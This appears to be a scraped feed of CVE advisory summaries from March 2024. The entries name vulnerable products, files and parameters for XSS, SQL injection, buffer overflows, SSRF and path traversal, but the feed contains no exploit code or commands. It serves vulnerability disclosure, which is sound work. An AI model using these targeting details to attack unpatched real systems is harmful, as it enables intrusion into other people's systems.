🚨 CVE-2024-29472OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Privilege Management module.🎖@cveNotify |
|
| 2024-03-20 21:37:38 |
🚨 CVE-2024-29470OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the component {{rootpath}}/links.🎖@cveNotify |
|
| 2024-03-20 21:37:37 |
🚨 CVE-2024-29037datahub-helm provides the Kubernetes Helm charts for deploying Datahub and its dependencies on a Kubernetes cluster. Starting in version 0.1.143 and prior to version 0.2.182, due to configuration issues in the helm chart, if there was a successful initial deployment during a limited window of time, personal access tokens were possibly created with a default secret key. Since the secret key is a static, publicly available value, someone could inspect the algorithm used to generate personal access tokens and generate their own for an instance. Deploying with Metadata Service Authentication enabled would have been difficult during window of releases. If someone circumvented the helm settings and manually set Metadata Service Authentication to be enabled using environment variables directly, this would skip over the autogeneration logic for the Kubernetes Secrets and DataHub GMS would default to the signing key specified statically in the application.yml. Most deployments probably did not attempt to circumvent the helm settings to enable Metadata Service Authentication during this time, so impact is most likely limited. Any deployments with Metadata Service Authentication enabled should ensure that their secret values are properly randomized. Version 0.2.182 contains a patch for this issue. As a workaround, one may reset the token signing key to be a random value, which will invalidate active personal access tokens.🎖@cveNotify |
|
| 2024-03-20 21:37:33 |
🚨 CVE-2024-29033OAuthenticator provides plugins for JupyterHub to use common OAuth providers, as well as base classes for writing one's own Authenticators with any OAuth 2.0 provider. `GoogleOAuthenticator.hosted_domain` is used to restrict what Google accounts can be authorized access to a JupyterHub. The restriction is intented to be to Google accounts part of one or more Google organization verified to control specified domain(s). Prior to version 16.3.0, the actual restriction has been to Google accounts with emails ending with the domain. Such accounts could have been created by anyone which at one time was able to read an email associated with the domain. This was described by Dylan Ayrey (@dxa4481) in this [blog post] from 15th December 2023). OAuthenticator 16.3.0 contains a patch for this issue. As a workaround, restrict who can login another way, such as `allowed_users` or `allowed_google_groups`.🎖@cveNotify |
|
| 2024-03-20 21:37:32 |
🚨 CVE-2024-29018Moby is an open source container framework that is a key component of Docker Engine, Docker Desktop, and other distributions of container tooling or runtimes. Moby's networking implementation allows for many networks, each with their own IP address range and gateway, to be defined. This feature is frequently referred to as custom networks, as each network can have a different driver, set of parameters and thus behaviors. When creating a network, the `--internal` flag is used to designate a network as _internal_. The `internal` attribute in a docker-compose.yml file may also be used to mark a network _internal_, and other API clients may specify the `internal` parameter as well.When containers with networking are created, they are assigned unique network interfaces and IP addresses. The host serves as a router for non-internal networks, with a gateway IP that provides SNAT/DNAT to/from container IPs.Containers on an internal network may communicate between each other, but are precluded from communicating with any networks the host has access to (LAN or WAN) as no default route is configured, and firewall rules are set up to drop all outgoing traffic. Communication with the gateway IP address (and thus appropriately configured host services) is possible, and the host may communicate with any container IP directly.In addition to configuring the Linux kernel's various networking features to enable container networking, `dockerd` directly provides some services to container networks. Principal among these is serving as a resolver, enabling service discovery, and resolution of names from an upstream resolver.When a DNS request for a name that does not correspond to a container is received, the request is forwarded to the configured upstream resolver. This request is made from the container's network namespace: the level of access and routing of traffic is the same as if the request was made by the container itself.As a consequence of this design, containers solely attached to an internal network will be unable to resolve names using the upstream resolver, as the container itself is unable to communicate with that nameserver. Only the names of containers also attached to the internal network are able to be resolved.Many systems run a local forwarding DNS resolver. As the host and any containers have separate loopback devices, a consequence of the design described above is that containers are unable to resolve names from the host's configured resolver, as they cannot reach these addresses on the host loopback device. To bridge this gap, and to allow containers to properly resolve names even when a local forwarding resolver is used on a loopback address, `dockerd` detects this scenario and instead forward DNS requests from the host namework namespace. The loopback resolver then forwards the requests to its configured upstream resolvers, as expected.Because `dockerd` forwards DNS requests to the host loopback device, bypassing the container network namespace's normal routing semantics entirely, internal networks can unexpectedly forward DNS requests to an external nameserver. By registering a domain for which they control the authoritative nameservers, an attacker could arrange for a compromised container to exfiltrate data by encoding it in DNS queries that will eventually be answered by their nameservers.Docker Desktop is not affected, as Docker Desktop always runs an internal resolver on a RFC 1918 address.Moby releases 26.0.0, 25.0.4, and 23.0.11 are patched to prevent forwarding any DNS requests from internal networks. As a workaround, run containers intended to be solely attached to internal networks with a custom upstream address, which will force all upstream DNS queries to be resolved from the container's network namespace.🎖@cveNotify |
|
| 2024-03-20 21:37:31 |
🚨 CVE-2024-25294An SSRF issue in REBUILD v.3.5 allows a remote attacker to obtain sensitive information and execute arbitrary code via the FileDownloader.java, proxyDownload,URL parameters.🎖@cveNotify |
|
| 2024-03-20 20:37:51 |
🚨 CVE-2024-2714A vulnerability has been found in Campcodes Complete Online DJ Booking System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/booking-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257467.🎖@cveNotify |
|
| 2024-03-20 20:37:47 |
🚨 CVE-2024-28868Umbraco is an ASP.NET content management system. Umbraco 10 prior to 10.8.4 with access to the native login screen is vulnerable to a possible user enumeration attack. This issue was fixed in version 10.8.5. As a workaround, one may disable the native login screen by exclusively using external logins.🎖@cveNotify |
|
| 2024-03-20 20:37:46 |
🚨 CVE-2024-23721A Directory Traversal issue was discovered in process_post on Draytek Vigor3910 4.3.2.5 devices. When sending a certain POST request, it calls the function and exports information.🎖@cveNotify |
|
| 2024-03-20 18:37:35 |
🚨 CVE-2024-2710A vulnerability was found in Tenda AC10U 15.03.06.49. It has been declared as critical. Affected by this vulnerability is the function setSchedWifi of the file /goform/openSchedWifi. The manipulation of the argument schedStartTime leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257461 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-20 18:37:34 |
🚨 CVE-2024-2708A vulnerability was found in Tenda AC10U 15.03.06.49 and classified as critical. This issue affects the function formexeCommand of the file /goform/execCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257459. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-20 18:37:33 |
🚨 CVE-2024-23821GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the GWC Demos Page. Access to the GWC Demos Page is available to all users although data security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a patch for this issue.🎖@cveNotify |
|
| 2024-03-20 18:37:29 |
🚨 CVE-2024-23818GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.3 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap OpenLayers Output Format. Access to the WMS OpenLayers Format is available to all users by default although data and service security may limit users' ability to trigger the XSS. Versions 2.23.3 and 2.24.1 contain a patch for this issue.🎖@cveNotify |
|
| 2024-03-20 18:37:28 |
🚨 CVE-2024-23642GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap SVG Output Format when the Simple SVG renderer is enabled. Access to the WMS SVG Format is available to all users by default although data and service security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a fix for this issue.🎖@cveNotify |
|
| 2024-03-20 18:37:27 |
🚨 CVE-2023-45177IBM MQ 9.0 LTS, 9.1 LTS, 9.2 LTS, 9.3 LTS and 9.3 CD is vulnerable to a denial-of-service attack due to an error within the MQ clustering logic. IBM X-Force ID: 268066.🎖@cveNotify |
|
| 2024-03-19 18:37:24 |
🚨 CVE-2024-21677This High severity Path Traversal vulnerability was introduced in version 6.13.0 of Confluence Data Center. This Path Traversal vulnerability, with a CVSS Score of 8.3, allows an unauthenticated attacker to exploit an undefinable vulnerability which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction.Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Data Center Atlassian recommends that Confluence Data Center customers upgrade to the latest version and that Confluence Server customers upgrade to the latest 8.5.x LTS version.If you are unable to do so, upgrade your instance to one of the specified supported fixed versions See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.htmlYou can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives. This vulnerability was reported via our Bug Bounty program.🎖@cveNotify |
|
| 2024-03-19 18:07:32 |
🚨 CVE-2010-1359SQL injection vulnerability in bluegate_seo.inc.php in the Direct URL module for xt:Commerce, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the coID parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.🎖@cveNotify |
|
| 2024-03-19 18:07:25 |
🚨 CVE-2008-6045Session fixation vulnerability in shopping_cart.php in xt:Commerce 3.0.4 and earlier allows remote attackers to hijack web sessions by setting the XTCsid parameter.🎖@cveNotify |
|
| 2024-03-19 18:07:24 |
🚨 CVE-2007-1126Directory traversal vulnerability in index.php in xtcommerce allows remote attackers to read arbitrary files via a .. (dot dot) in the template parameter.🎖@cveNotify |
|
| 2024-03-19 17:07:32 |
🚨 CVE-2023-46179IBM Sterling Secure Proxy 6.0.3 and 6.1.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 269683.🎖@cveNotify |
|
| 2024-03-19 17:07:31 |
🚨 CVE-2024-26163Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-03-19 17:07:30 |
🚨 CVE-2024-27266IBM Maximo Application Suite 7.6.1.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 284566.🎖@cveNotify |
|
| 2024-03-19 17:07:26 |
🚨 CVE-2024-22346Db2 for IBM i 7.2, 7.3, 7.4, and 7.5 infrastructure could allow a local user to gain elevated privileges due to an unqualified library call. A malicious actor could cause user-controlled code to run with administrator privilege. IBM X-Force ID: 280203.🎖@cveNotify |
|
| 2024-03-19 17:07:25 |
🚨 CVE-2022-45169An issue was discovered in LIVEBOX Collaboration vDesk through v031. A URL Redirection to an Untrusted Site (Open Redirect) can occur under the /api/v1/notification/createnotification endpoint, allowing an authenticated user to send an arbitrary push notification to any other user of the system. This push notification can include an (invisible) clickable link.🎖@cveNotify |
|
| 2024-03-19 16:37:38 |
🚨 CVE-2024-29117Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cimatti Consulting Contact Forms by Cimatti allows Stored XSS.This issue affects Contact Forms by Cimatti: from n/a through 1.7.0.🎖@cveNotify |
|
| 2024-03-19 16:37:31 |
🚨 CVE-2024-29114Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in W3 Eden, Inc. Download Manager allows Stored XSS.This issue affects Download Manager: from n/a through 3.2.84.🎖@cveNotify |
|
| 2024-03-19 16:37:30 |
🚨 CVE-2024-29112Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Marketing Robot WooCommerce Google Feed Manager allows Stored XSS.This issue affects WooCommerce Google Feed Manager: from n/a through 2.2.0.🎖@cveNotify |
|
| 2024-03-19 16:37:26 |
🚨 CVE-2024-29109Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jan-Peter Lambeck & 3UU Shariff Wrapper allows Stored XSS.This issue affects Shariff Wrapper: from n/a through 4.6.10.🎖@cveNotify |
|
| 2024-03-19 16:37:25 |
🚨 CVE-2023-50966erlang-jose (aka JOSE for Erlang and Elixir) through 1.11.6 allow attackers to cause a denial of service (CPU consumption) via a large p2c (aka PBES2 Count) value in a JOSE header.🎖@cveNotify |
|
| 2024-03-19 15:37:43 |
🚨 CVE-2024-29126Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jose Mortellaro Specific Content For Mobile – Customize the mobile version without redirections allows Reflected XSS.This issue affects Specific Content For Mobile – Customize the mobile version without redirections: from n/a through 0.1.9.5.🎖@cveNotify |
|
| 2024-03-19 15:37:42 |
🚨 CVE-2024-29124Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AAM Advanced Access Manager allows Stored XSS.This issue affects Advanced Access Manager: from n/a through 6.9.20.🎖@cveNotify |
|
| 2024-03-19 15:37:37 |
🚨 CVE-2024-29122Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Foliovision: Making the web work for you FV Flowplayer Video Player allows Stored XSS.This issue affects FV Flowplayer Video Player: from n/a through 7.5.41.7212.🎖@cveNotify |
|
| 2024-03-19 15:37:36 |
🚨 CVE-2024-29117Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cimatti Consulting Contact Forms by Cimatti allows Stored XSS.This issue affects Contact Forms by Cimatti: from n/a through 1.7.0.🎖@cveNotify |
|
| 2024-03-19 15:37:31 |
🚨 CVE-2024-29115Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zaytech Smart Online Order for Clover allows Stored XSS.This issue affects Smart Online Order for Clover: from n/a through 1.5.5.🎖@cveNotify |
|
| 2024-03-19 15:37:30 |
🚨 CVE-2024-29112Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Marketing Robot WooCommerce Google Feed Manager allows Stored XSS.This issue affects WooCommerce Google Feed Manager: from n/a through 2.2.0.🎖@cveNotify |
|
| 2024-03-19 15:37:26 |
🚨 CVE-2024-29110Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pauple Table & Contact Form 7 Database – Tablesome allows Reflected XSS.This issue affects Table & Contact Form 7 Database – Tablesome: from n/a through 1.0.27.🎖@cveNotify |
|
| 2024-03-19 15:37:25 |
🚨 CVE-2024-1401The Profile Box Shortcode And Widget WordPress plugin before 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-03-19 15:37:24 |
🚨 CVE-2023-50966erlang-jose (aka JOSE for Erlang and Elixir) through 1.11.6 allow attackers to cause a denial of service (CPU consumption) via a large p2c (aka PBES2 Count) value in a JOSE header.🎖@cveNotify |
|
| 2024-03-19 11:37:24 |
🚨 CVE-2024-27439An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket.This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series.Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected.Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.🎖@cveNotify |
|
| 2024-03-19 09:37:27 |
🚨 CVE-2024-24683Improper Input Validation vulnerability in Apache Hop Engine.This issue affects Apache Hop Engine: before 2.8.0.Users are recommended to upgrade to version 2.8.0, which fixes the issue.When Hop Server writes links to the PrepareExecutionPipelineServlet page one of the parameters provided to the user was not properly escaped.The variable not properly escaped is the "id", which is not directly accessible by users creating pipelines making the risk of exploiting this low.This issue only affects users using the Hop Server component and does not directly affect the client.🎖@cveNotify |
|
| 2024-03-19 08:37:25 |
🚨 CVE-2024-22453Dell PowerEdge Server BIOS contains a heap-based buffer overflow vulnerability. A local high privileged attacker could potentially exploit this vulnerability to write to otherwise unauthorized memory.🎖@cveNotify |
|
| 2024-03-19 08:37:24 |
🚨 CVE-2023-42790A stack-based buffer overflow in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13 allows attacker to execute unauthorized code or commands via specially crafted HTTP requests.🎖@cveNotify |
|
| 2024-03-19 07:37:25 |
🚨 CVE-2024-24042Directory Traversal vulnerability in Devan-Kerman ARRP v.0.8.1 and before allows a remote attacker to execute arbitrary code via the dumpDirect in RuntimeResourcePackImpl component.🎖@cveNotify |
|
| 2024-03-19 07:37:24 |
🚨 CVE-2024-0054Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX APIs local_list.cgi, create_overlay.cgi and irissetup.cgi was vulnerable for file globbing which could lead to a resource exhaustion attack. Axis has released patched AXIS OSversions for the highlighted flaw. Please refer to the Axis security advisoryfor more information and solution.🎖@cveNotify |
|
| 2024-03-19 06:37:25 |
🚨 CVE-2024-28447Shenzhen Libituo Technology Co., Ltd LBT-T300-mini1 v1.2.9 was discovered to contain a buffer overflow via lan_ipaddr parameters at /apply.cgi.🎖@cveNotify |
|
| 2024-03-19 06:37:24 |
🚨 CVE-2024-26369An issue in the HistoryQosPolicy component of FastDDS v2.12.x, v2.11.x, v2.10.x, and v2.6.x leads to a SIGABRT (signal abort) upon receiving DataWriter's data.🎖@cveNotify |
|
| 2024-03-19 05:37:32 |
🚨 CVE-2024-22017setuid() does not affect libuv's internal io_uring operations if initialized before the call to setuid().This allows the process to perform privileged operations despite presumably having dropped such privileges through a call to setuid().This vulnerability affects all users using version greater or equal than Node.js 18.18.0, Node.js 20.4.0 and Node.js 21.🎖@cveNotify |
|
| 2024-03-19 05:37:26 |
🚨 CVE-2024-21504Versions of the package livewire/livewire from 3.3.5 and before 3.4.9 are vulnerable to Cross-site Scripting (XSS) when a page uses [Url] for a property. An attacker can inject HTML code in the context of the user's browser session by crafting a malicious link and convincing the user to click on it.🎖@cveNotify |
|
| 2024-03-19 05:37:25 |
🚨 CVE-2023-7192A memory leak problem was found in ctnetlink_create_conntrack in net/netfilter/nf_conntrack_netlink.c in the Linux Kernel. This issue may allow a local attacker with CAP_NET_ADMIN privileges to cause a denial of service (DoS) attack due to a refcount overflow.🎖@cveNotify |
|
| 2024-03-19 05:37:24 |
🚨 CVE-2023-4459A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup.🎖@cveNotify |
|
| 2024-03-19 04:37:24 |
🚨 CVE-2024-2604A vulnerability was found in SourceCodester File Manager App 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/update-file.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257182 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-19 03:37:25 |
🚨 CVE-2024-28757libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate).🎖@cveNotify |
|
| 2024-03-19 03:37:24 |
🚨 CVE-2023-47995Memory Allocation with Excessive Size Value discovered in BitmapAccess.cpp::FreeImage_AllocateBitmap in FreeImage 3.18.0 allows attackers to cause a denial of service.🎖@cveNotify |
|
| 2024-03-19 02:37:24 |
🚨 CVE-2024-2622A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318. It has been classified as critical. This affects an unknown part of the file /api/client/editemedia.php. The manipulation of the argument number/enterprise_uuid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257199.🎖@cveNotify |
|
| 2024-03-19 01:37:29 |
🚨 CVE-2024-2621A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php. The manipulation of the argument uuid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257198 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-19 01:37:26 |
🚨 CVE-2024-2620A vulnerability has been found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this vulnerability is an unknown functionality of the file api/client/down_file.php. The manipulation of the argument uuid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257197 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-19 01:37:25 |
🚨 CVE-2023-40276An issue was discovered in OpenClinic GA 5.247.01. An Unauthenticated File Download vulnerability has been discovered in pharmacy/exportFile.jsp.🎖@cveNotify |
|
| 2024-03-19 01:37:24 |
🚨 CVE-2023-40275An issue was discovered in OpenClinic GA 5.247.01. It allows retrieval of patient lists via queries such as findFirstname= to _common/search/searchByAjax/patientslistShow.jsp.🎖@cveNotify |
|
| 2024-03-19 01:07:25 |
🚨 CVE-2024-23296A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-03-19 01:07:24 |
🚨 CVE-2024-23225A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-03-18 22:37:32 |
🚨 CVE-2024-28248Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Starting in version 1.13.9 and prior to versions 1.13.13, 1.14.8, and 1.15.2, Cilium's HTTP policies are not consistently applied to all traffic in the scope of the policies, leading to HTTP traffic being incorrectly and intermittently forwarded when it should be dropped. This issue has been patched in Cilium 1.15.2, 1.14.8, and 1.13.13. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-03-18 22:37:26 |
🚨 CVE-2024-28237OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to configure or talk a victim with administrator rights into configuring a webcam snapshot URL which when tested through the "Test" button included in the web interface will execute JavaScript code in the victims browser when attempting to render the snapshot image. An attacker who successfully talked a victim with admin rights into performing a snapshot test with such a crafted URL could use this to retrieve or modify sensitive configuration settings, interrupt prints or otherwise interact with the OctoPrint instance in a malicious way. The vulnerability is patched in version 1.10.0rc3. OctoPrint administrators are strongly advised to thoroughly vet who has admin access to their installation and what settings they modify based on instructions by strangers.🎖@cveNotify |
|
| 2024-03-18 22:37:25 |
🚨 CVE-2023-49298OpenZFS through 2.1.13 and 2.2.x through 2.2.1, in certain scenarios involving applications that try to rely on efficient copying of file data, can replace file contents with zero-valued bytes and thus potentially disable security mechanisms. NOTE: this issue is not always security related, but can be security related in realistic situations. A possible example is cp, from a recent GNU Core Utilities (coreutils) version, when attempting to preserve a rule set for denying unauthorized access. (One might use cp when configuring access control, such as with the /etc/hosts.deny file specified in the IBM Support reference.) NOTE: this issue occurs less often in version 2.2.1, and in versions before 2.1.4, because of the default configuration in those versions.🎖@cveNotify |
|
| 2024-03-18 22:37:24 |
🚨 CVE-2013-20001An issue was discovered in OpenZFS through 2.0.3. When an NFS share is exported to IPv6 addresses via the sharenfs feature, there is a silent failure to parse the IPv6 address data, and access is allowed to everyone. IPv6 restrictions from the configuration are not applied.🎖@cveNotify |
|
| 2024-03-18 21:37:25 |
🚨 CVE-2024-23333LDAP Account Manager (LAM) is a webfrontend for managing entries stored in an LDAP directory. LAM's log configuration allows to specify arbitrary paths for log files. Prior to version 8.7, an attacker could exploit this by creating a PHP file and cause LAM to log some PHP code to this file. When the file is then accessed via web the code would be executed. The issue is mitigated by the following: An attacker needs to know LAM's master configuration password to be able to change the main settings; and the webserver needs write access to a directory that is accessible via web. LAM itself does not provide any such directories. The issue has been fixed in 8.7. As a workaround, limit access to LAM configuration pages to authorized users.🎖@cveNotify |
|
| 2024-03-18 21:37:24 |
🚨 CVE-2024-22412ClickHouse is an open-source column-oriented database management system. A bug exists in the cloud ClickHouse offering prior to version 24.0.2.54535 and in github.com/clickhouse/clickhouse version 23.1. Query caching bypasses the role based access controls and the policies being enforced on roles. In affected versions, the query cache only respects separate users, however this is not documented and not expected behavior. People relying on ClickHouse roles can have their access control lists bypassed if they are using query caching. Attackers who have control of a role could guess queries and see data they shouldn't have access to. Version 24.1 of ClickHouse and version 24.0.2.54535 of ClickHouse Cloud contain a patch for this issue. Based on the documentation, role based access control should be enforced regardless if query caching is enabled or not.🎖@cveNotify |
|
| 2024-03-18 20:37:25 |
🚨 CVE-2023-39361Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-03-18 20:37:24 |
🚨 CVE-2023-39360Cacti is an open source operational monitoring and fault management framework.Affected versions are subject to a Stored Cross-Site-Scripting (XSS) Vulnerability allows an authenticated user to poison data. The vulnerability is found in `graphs_new.php`. Several validations are performed, but the `returnto` parameter is directly passed to `form_save_button`. In order to bypass this validation, returnto must contain `host.php`. This vulnerability has been addressed in version 1.2.25. Users are advised to upgrade. Users unable to update should manually filter HTML output.🎖@cveNotify |
|
| 2024-03-18 20:07:32 |
🚨 CVE-2024-27768Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-22: 'Path Traversal' may allow RCE🎖@cveNotify |
|
| 2024-03-18 20:07:25 |
🚨 CVE-2024-28550Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the filePath parameter of formExpandDlnaFile function.🎖@cveNotify |
|
| 2024-03-18 20:07:24 |
🚨 CVE-2023-7250A flaw was found in iperf, a utility for testing network performance using TCP, UDP, and SCTP. A malicious or malfunctioning client can send less than the expected amount of data to the iperf server, which can cause the server to hang indefinitely waiting for the remainder or until the connection gets closed. This will prevent other connections to the server, leading to a denial of service.🎖@cveNotify |
|
| 2024-03-18 19:37:32 |
🚨 CVE-2024-0711The Buttons Shortcode and Widget WordPress plugin through 1.16 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-03-18 19:37:25 |
🚨 CVE-2023-6821The Error Log Viewer by BestWebSoft WordPress plugin before 1.1.3 contains a vulnerability that allows you to read and download PHP logs without authorization🎖@cveNotify |
|
| 2024-03-18 19:37:24 |
🚨 CVE-2023-41334Astropy is a project for astronomy in Python that fosters interoperability between Python astronomy packages. Version 5.3.2 of the Astropy core package is vulnerable to remote code execution due to improper input validation in the `TranformGraph().to_dot_graph` function. A malicious user can provide a command or a script file as a value to the `savelayout` argument, which will be placed as the first value in a list of arguments passed to `subprocess.Popen`. Although an error will be raised, the command or script will be executed successfully. Version 5.3.3 fixes this issue.🎖@cveNotify |
|
| 2024-03-18 19:07:30 |
🚨 CVE-2023-52449In the Linux kernel, the following vulnerability has been resolved:mtd: Fix gluebi NULL pointer dereference caused by ftl notifierIf both ftl.ko and gluebi.ko are loaded, the notifier of ftltriggers NULL pointer dereference when trying to access‘gluebi->desc’ in gluebi_read().ubi_gluebi_init ubi_register_volume_notifier ubi_enumerate_volumes ubi_notify_all gluebi_notify nb->notifier_call() gluebi_create mtd_device_register mtd_device_parse_register add_mtd_device blktrans_notify_add not->add() ftl_add_mtd tr->add_mtd() scan_header mtd_read mtd_read_oob mtd_read_oob_std gluebi_read mtd->read() gluebi->desc - NULLDetailed reproduction information available at the Link [1],In the normal case, obtain gluebi->desc in the gluebi_get_device(),and access gluebi->desc in the gluebi_read(). However,gluebi_get_device() is not executed in advance in theftl_add_mtd() process, which leads to NULL pointer dereference.The solution for the gluebi module is to run jffs2 on the UBIvolume without considering working with ftl or mtdblock [2].Therefore, this problem can be avoided by preventing gluebi fromcreating the mtdblock device after creating mtd partition of thetype MTD_UBIVOLUME.🎖@cveNotify |
|
| 2024-03-18 19:07:26 |
🚨 CVE-2023-52448In the Linux kernel, the following vulnerability has been resolved:gfs2: Fix kernel NULL pointer dereference in gfs2_rgrp_dumpSyzkaller has reported a NULL pointer dereference when accessingrgd->rd_rgl in gfs2_rgrp_dump(). This can happen when creatingrgd->rd_gl fails in read_rindex_entry(). Add a NULL pointer check ingfs2_rgrp_dump() to prevent that.🎖@cveNotify |
|
| 2024-03-18 19:07:25 |
🚨 CVE-2023-6517Exposure of Sensitive Information Due to Incompatible Policies vulnerability in Mia Technology Inc. M?A-MED allows Collect Data as Provided by Users.This issue affects M?A-MED: before 1.0.7.🎖@cveNotify |
|
| 2024-03-18 19:07:24 |
🚨 CVE-2023-6515Authorization Bypass Through User-Controlled Key vulnerability in Mia Technology Inc. M?A-MED allows Authentication Abuse.This issue affects M?A-MED: before 1.0.7.🎖@cveNotify |
|
| 2024-03-18 18:37:30 |
